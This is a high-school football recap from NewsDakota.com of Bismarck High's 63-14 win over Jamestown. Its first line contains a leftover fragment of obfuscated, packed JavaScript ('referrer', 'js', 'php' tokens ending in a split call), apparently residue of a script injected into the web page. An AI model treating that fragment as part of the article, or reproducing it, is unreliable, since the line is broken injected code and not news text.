BISMARCK fifnh|var|u0026u|referrer|dznkb||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – This one wasn’t in doubt for very long. The only thing that went right for Jamestown was a first down on their opening drive, but after that Bismarck High was out to a 28-0 first quarter lead. The Demons would go onto a 63-14 victory to stay unbeaten in Class AAA football.
Jamestown won the toss and elected to take the football which meant Bismarck could take the wind which was howling at 30mph in the first quarter. The decision would be one the Jays would come to regret. They were never able to flip the field position and all four first quarter scoring drives for Bismarck starter at their own 48 or better.
At one point the Demons scored on three consecutive plays all scoring runs from Jaxon Ford who would score five touchdowns in the game. His final touchdown came on the second half kick-off.
The Jays will host Century on Friday. The Patriots are coming off a 35-28 overtime loss to the Dickinson Midgets.
